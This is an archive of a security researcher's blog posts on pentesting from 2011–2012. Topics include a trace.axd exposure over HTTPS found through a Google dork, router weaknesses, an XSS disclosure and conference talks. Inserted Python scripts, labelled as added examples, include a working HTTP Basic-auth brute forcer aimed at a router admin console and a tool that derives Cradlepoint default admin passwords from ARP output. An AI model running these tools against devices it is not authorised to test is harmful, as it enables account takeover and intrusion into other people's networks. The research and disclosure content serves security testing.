Recently, I was going through Attack Research's blog post on trace.axd (http://carnal0wnage.attackresearch.com/2012/05/from-low-to-pwned-12-traceaxd.html). The information present in trace files is always important and sometimes yields additional benefits from a pen tester's perspective. There is some additional information I want to add about a misconfiguration in the web server setup. Simple, but worthwhile.
During my testing, I have seen that a misconfigured redirection from port 80 to port 443, including path entries, can have serious implications. I am taking trace.axd as a simple example. Running the Google dork (inurl:trace filetype:axd site:com) returns several targets. Here is an interesting case study.
1. Accessing the target through a browser returns the following:
The response headers are:
(Status-Line) HTTP/1.1 403 Forbidden
Cache-Control private
Content-Type text/html; charset=utf-8
Server Microsoft-IIS/7.5
X-AspNet-Version 2.0.50727
X-Powered-By ASP.NET
Date Wed, 30 May 2012 18:41:24 GMT
Content-Length 2062
The Metasploit trace.axd auxiliary module produces the same result.
2. This is not the end. Due to inappropriate configuration, the same path can be accessed over HTTPS. Really? Let's see.
The response headers for this request are
(Status-Line) HTTP/1.1 200 OK
Cache-Control private
Content-Type text/html; charset=utf-8
Content-Encoding gzip
Vary Accept-Encoding
Server Microsoft-IIS/7.5
X-AspNet-Version 2.0.50727
X-Powered-By ASP.NET
Date Wed, 30 May 2012 18:40:59 GMT
Content-Length 1322
The two captures show the same path being handled differently depending on the binding: whatever restriction produces the 403 Forbidden over HTTP (for example an IIS IP or authorization rule applied only to the port 80 site) is not applied to the HTTPS binding, which serves the trace output with 200 OK. A restriction on a path must be enforced identically on every port and binding, or the server should return the same error over both.
Use the Metasploit auxiliary module to extract all the information, or browse it directly.
The overall aim is to check every entry point while doing a penetration test: the same path on every port and binding, not just the one the application advertises.
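The check described in this post, as an added example that is not code from the original page or from Metasploit: the captures above show /trace.axd answering 403 over port 80 and 200 over port 443. The script below requests the same path over both bindings of a host and flags any host whose status codes disagree. The host names in the usage block at the bottom are placeholders.

```python
"""Compare how one path is served over the HTTP and HTTPS bindings of a host.

Added example for this post (not code from the original page or from
Metasploit). It requests the same path over port 80 and port 443 and flags
hosts where the status codes differ, which is the condition the post
describes. The target host names at the bottom are placeholders.
"""
import http.client
import ssl


def fetch_status(host, path, scheme, timeout=10):
    """Return (status, Server header) for GET path over the given scheme."""
    if scheme == "https":
        ctx = ssl.create_default_context()
        # Misconfigured hosts often carry self-signed certificates; only the
        # status code matters here, so certificate validation is skipped.
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        conn = http.client.HTTPSConnection(host, 443, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, 80, timeout=timeout)
    try:
        conn.request("GET", path, headers={"User-Agent": "binding-check/1.0"})
        resp = conn.getresponse()
        resp.read()  # drain the body so the connection closes cleanly
        return resp.status, resp.getheader("Server", "")
    finally:
        conn.close()


def compare_bindings(host, path, fetch=fetch_status):
    """Fetch `path` over HTTP and HTTPS and report whether they disagree.

    `fetch` is injectable so the comparison logic can be exercised without
    network access. A binding that cannot be reached is recorded as "error"
    rather than counted as a mismatch: a closed port is not the
    misconfiguration the post describes.
    """
    result = {"host": host, "path": path, "server": ""}
    for scheme in ("http", "https"):
        try:
            status, server = fetch(host, path, scheme)
        except (OSError, http.client.HTTPException):
            status, server = "error", ""
        result[scheme] = status
        result["server"] = result["server"] or server
    both_answered = all(isinstance(result[s], int) for s in ("http", "https"))
    result["inconsistent"] = both_answered and result["http"] != result["https"]
    return result


def report(results):
    """One line per host, prefixed MISMATCH where the bindings disagree."""
    lines = []
    for r in results:
        flag = "MISMATCH" if r["inconsistent"] else "ok"
        lines.append(f"{flag:8} {r['host']}{r['path']}  http={r['http']}  "
                     f"https={r['https']}  server={r['server']}")
    return lines


if __name__ == "__main__":
    # Placeholder targets; replace with hosts you are authorised to test.
    targets = ["host1.example", "host2.example"]
    for line in report([compare_bindings(h, "/trace.axd") for h in targets]):
        print(line)
```

Run it against a list of hosts from the dork; any line starting with MISMATCH is a host where the restriction is bound to one port only and deserves a manual look over the other one.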
Enjoy !
Wednesday, May 30, 2012
Thursday, May 24, 2012
Responsible Disclosure - XSS in ZScaler Gateway Application
Updated: I mentioned this issue to SecurityWeek's author Steve Regan after reading his story here: http://www.securityweek.com/zscaler-accused-throwing-stones-glass-house-over-xss-vulnerability. He quoted this blog post as an addition to the story.
Some of the XSS bugs were responsibly disclosed to the security team at ZScaler. Thanks to Michael Sutton for responding quickly. The vulnerability is patched now.
Proof of Concept is here:
We stick to responsible disclosure to help make the community more secure.
Enjoy !
Sunday, May 20, 2012
McAfee or is it Mcaf.ee - Interesting !
Update: Seems like a legitimate service by McAfee. The geek-mode functionality raised a suspicion. Thanks to anonymous for pointing this out.
I was looking for some interesting malware samples and came across a hilarious but apparently rogue domain using the McAfee name. It is actually a URL shortening service hosted on this domain. If you want to try it, click here: http://mcaf.ee.
Typically, the shortening and expansion process works as shown below
mcaf.ee~> s http://www.google.com
> The shortened url is >> http://mcaf.ee/f1cd29 << [Copy]
mcaf.ee~> e http://mcaf.ee/f1cd29 > The expanded url is >> http://www.google.com << [Copy]
mcaf.ee~>
The following URLs are accessed by this service for its primary actions.
[1] hxxp://mcaf.ee/api/shorten?callback=jsonp1337557363223&input_url=http%3A%2F%2Fwww.google.com
[2] hxxp://mcaf.ee/assets/ZeroClipboard10.swf
The analysis of ZeroClipboard10.swf is present here : http://jsunpack.jeek.org/?report=5c4bf5f21ec4870d16e89e9d8f32bee124a8344b
Other interesting links are as follows:
hxxp://mcaf.ee/config?geekmode=1
hxxp://mcaf.ee/js/geek.js
The domain is still up as of now. You might want to take a look :)
Monday, April 16, 2012
Fun Hacking - Story of WiFi Airbox Cellular Routers
I am always curious to learn more about new network devices such as WiFi routers, so I started poking at one. Basically, the mobile WiFi provides default access to an internet connection. I got my device onto the network.
1. A quick IP lookup provided me with the IP address of the mobile WiFi router present in the
2. The very basic thing is to browse to the web admin console, which by default presents an HTTP Basic authentication prompt. At this point, I wanted the details of the mobile WiFi router, so I quickly issued [ printf 'GET / HTTP/1.0\r\n\r\n' | nc 192.168.100.1 80 ] to extract the HTTP response from the web server used for administration. Unfortunately, it was not giving any reply. That's fine.
3. A quick scan revealed that port 81 was open. So I fired up the web browser to see if something was there for me on port 81. The port displayed the following web page
Yeah, that's more than the information I wanted. The mobile WiFi router was an AirBox cellular router designed by waav.com. Additionally, port 53 was also open for DNS queries, but that was not the target.
4. So, the next step was to download the manual for this WiFi router. I did, and read it carefully. As is common, the AirBox router ships with default credentials. Look at the excerpt from the AirBox manual: http://waav.com/AirBox_Manual_V2.5.pdf.
5. Based on this information, I built a password list and also used standard password lists to brute-force the account. Within a few seconds I had the admin interface password. If you are lucky, you will find the default credentials still present on these routers. Security is always creepy on these devices. I always look at the DHCP leases to find out how many devices are connected to the router. As said, I did the same.
So the lesson is: we need to delve more into the security of these devices.
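The brute-force step in point 5, as an added example that is not code from the original post: it builds the candidate list from manual-derived defaults followed by a generic wordlist, sends each pair as an HTTP Basic Authorization header and stops at the first response that is not 401. The usernames and passwords in the usage block are placeholders, not values taken from the AirBox manual; the attempt function is injectable so the loop can be exercised without a live device.

```python
"""HTTP Basic authentication brute force against a router admin console.

Added example for this post, not code from the original page. The post
built a password list from defaults in the AirBox manual plus standard
wordlists and tried them against the admin console's Basic auth prompt;
this script does the same against any Basic-auth protected URL. The
default usernames and passwords at the bottom are placeholders for
illustration, not values taken from the AirBox manual.
"""
import base64
import http.client


def basic_auth_header(user, password):
    """Build the Authorization header for HTTP Basic authentication."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def try_login(host, port, path, user, password, timeout=5):
    """Send one credential pair and return the HTTP status code."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers=basic_auth_header(user, password))
        resp = conn.getresponse()
        resp.read()
        return resp.status
    finally:
        conn.close()


def build_candidates(manual_defaults, wordlist):
    """Defaults from the device manual first, then the generic wordlist,
    deduplicated while preserving order so the likeliest guesses go first."""
    seen = set()
    ordered = []
    for pw in list(manual_defaults) + list(wordlist):
        if pw not in seen:
            seen.add(pw)
            ordered.append(pw)
    return ordered


def brute_force(host, port, path, users, passwords, attempt=try_login):
    """Return (user, password, status) for the first accepted pair, or None.

    401 means the server rejected the pair. Any other status is returned as
    a hit for the operator to confirm, since embedded web servers answer
    200, 302 or even 403 once credentials are accepted. `attempt` is
    injectable so the loop can be tested without a live device.
    """
    for user in users:
        for pw in passwords:
            status = attempt(host, port, path, user, pw)
            if status != 401:
                return user, pw, status
    return None


if __name__ == "__main__":
    # Placeholder values; build the real defaults list from the vendor manual.
    users = ["admin"]
    passwords = build_candidates(["admin", "password"], ["123456", "admin", "letmein"])
    print(brute_force("192.168.100.1", 80, "/", users, passwords))
```

Embedded devices rarely rate-limit Basic auth, which is why the post's run finished in seconds; treating every non-401 as a hit (rather than only 200) avoids missing a console that redirects after login.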
Friday, February 17, 2012
Android Emulator - Pentesting - Encountered Errors
The "INSTALL_FAILED_MISSING_SHARED_LIBRARY" error is a very common problem encountered in day-to-day work. The Android emulator throws it legitimately when an application pushed to it for testing declares a dependency (a uses-library entry in its manifest) on a shared library that the emulator image does not contain.
This error is an outcome of choosing the wrong target, Android API versus Google APIs, for the Android Virtual Device (AVD). An application that depends on one of the Google add-on libraries needs an AVD built on the Google APIs target; if your AVD is built on the plain Android target, you are going to face this problem.
For example: let's have a look at this emulator
and now we want to install the Anti toolkit on it, which results in the following error
The next step, we tried this -
The result is as expected
Also give the AVD an appropriate partition size (the emulator's -partition-size option) to avoid storage trouble while testing.
Sunday, February 05, 2012
Hacking Cradle Point Routers - Obscurity at the Peak
Cradlepoint wireless routers are used heavily for setting up small networks. Cradlepoint uses MAC-specific authentication credentials that are unique for every router because the MAC address is unique. In general, Cradlepoint chose this behaviour to give each device its own password rather than relying on a single default password, which most LAN/WLAN routers use.
Cradlepoint uses the last six characters of the MAC address as the password by default. At first glance this looks more secure. However, it is not appropriate from a security point of view, because a MAC address is not a secret: it is visible to every host on the link. For administrative logins and first-time user authentication, a login page is displayed that asks for the internet access password.
The question is: how to get the password for unmanaged routers? Well, it is in the MAC address. Once you are inside the WLAN you already have an IP address, which means the Address Resolution Protocol (ARP), which maps the network-layer address (IP) to the link-layer address (Ethernet/MAC), is the key. The login page looks as follows
The designers made a mistake with this layout because, to get the administrative web page, the client has to connect to the network first. Once a user activates the wireless connection it gets connected to the WLAN, which has a gateway address of 192.168.0.1 (the default for Cradlepoint routers). It is hilarious, but it is trivial to subvert this and get the password. Now the attacker is on the network, so the ARP entry that resolves the gateway's IP address to its MAC address is available (simply ping the gateway and read the ARP cache).
As per the documentation, the password has to be 071640. Let's try
So ..........
Configure your devices in a secure manner.
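The derivation described above, as an added example that is not the page's own code: it parses ARP table output in the Linux/macOS and Windows `arp -a` formats, picks out the gateway entry and returns the last six hex characters of its MAC as the candidate password. Both ARP dumps in the script are constructed for the example; the MAC in them was chosen so the result matches the 071640 value used in the post.

```python
"""Derive the default Cradlepoint-style password from the gateway's MAC.

Added example for this post, not the page's own code. The post explains
that the router's default password is the last six hex characters of its
MAC address, and that any client on the WLAN can learn that MAC from its
own ARP cache after pinging the gateway. This script parses ARP table
output (Linux/macOS `arp -a` and Windows `arp -a` formats), finds the
gateway entry and returns the candidate password(s). The two ARP dumps
below are constructed for the example, not captured from a real device.
"""
import re

MAC_RE = re.compile(r"(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}")

# Constructed sample output, not captured from a real device.
SAMPLE_ARP_UNIX = """\
? (192.168.0.1) at 00:30:44:07:16:40 [ether] on wlan0
? (192.168.0.10) at 3c:5a:b4:12:34:56 [ether] on wlan0
"""
SAMPLE_ARP_WINDOWS = """\
Interface: 192.168.0.23 --- 0xb
  Internet Address      Physical Address      Type
  192.168.0.1           00-30-44-07-16-40     dynamic
  192.168.0.10          3c-5a-b4-12-34-56     dynamic
"""


def find_gateway_mac(arp_output, gateway_ip="192.168.0.1"):
    """Return the normalised MAC for gateway_ip from ARP output, or None.

    The IP is matched as a whole token so 192.168.0.1 does not match the
    line for 192.168.0.10. Populate the cache first with `ping <gateway>`.
    """
    ip_pattern = re.compile(r"(?<![\d.])" + re.escape(gateway_ip) + r"(?![\d.])")
    for line in arp_output.splitlines():
        if not ip_pattern.search(line):
            continue
        m = MAC_RE.search(line)
        if m:
            return m.group(0).lower().replace("-", ":")
    return None


def candidate_passwords(mac):
    """Last six hex digits of the MAC, as the post describes.

    The post's example is all digits, so case never arose; when the tail
    contains letters both cases are returned so the operator can try each.
    """
    hexdigits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(hexdigits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    tail = hexdigits[-6:]
    return sorted({tail.lower(), tail.upper()})


def default_password_from_arp(arp_output, gateway_ip="192.168.0.1"):
    """Convenience wrapper: ARP dump in, candidate password list out."""
    mac = find_gateway_mac(arp_output, gateway_ip)
    if mac is None:
        return []
    return candidate_passwords(mac)


if __name__ == "__main__":
    for dump in (SAMPLE_ARP_UNIX, SAMPLE_ARP_WINDOWS):
        print(find_gateway_mac(dump), default_password_from_arp(dump))
```

Six hex characters is a 24-bit keyspace on paper, but since the router announces those exact bits in every frame it sends, the effective secret is zero bits for anyone already on the WLAN; that is the obscurity problem the post's title refers to.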
Saturday, December 24, 2011
Virus Bulletin - Talk
Check out my virus bulletin talk - http://www.virusbtn.com/conference/vb2011/590oYHwdzKZp/abstracts/Sood.xml
Wednesday, September 28, 2011
BruCon 2011 - Botnets and Browsers
I presented at BruCon 2011 on Botnets and Browsers.
A nice writeup is here - http://blog.c22.cc/2011/09/20/brucon-botnets-and-browsers-brothers-in-a-ghost-shell/
Enjoy !
Sunday, September 04, 2011
Wednesday, August 31, 2011
PenTest Magazine - Breaking Down i*{Devices} - Testing iPhone Security
Smartphones have revolutionized the world, and the online world is grappling with severe security and privacy issues. Smartphone applications require an aggressive approach to security testing and integrity verification in order to satisfy the three pillars of security: confidentiality, integrity and availability.
This paper sheds light on the behavioral testing and security issues present in Apple's iOS devices and applications. Primarily, this paper revolves around penetration testing of the iPhone device and its applications. The paper does not discuss iPhone application source code analysis or reverse engineering.
Download the magazine from : HERE
PenTest Magazine Teaser - Mobile Hacking
Thursday, August 25, 2011
Dissecting Java Server Faces for Penetration Testing
This paper sheds light on the findings of security testing of Java Server Faces. JSF has been widely used as an open source web framework for developing efficient applications using J2EE. JSF is compared with ASP.NET framework to unearth potential security flaws.
This paper is an outcome of my work at Cigital Labs. It is a collaborative work with Security Compass team.
Download : http://www.cigital.com/papers/download/dissecting_jsf_pt_aks_kr.pdf
Enjoy!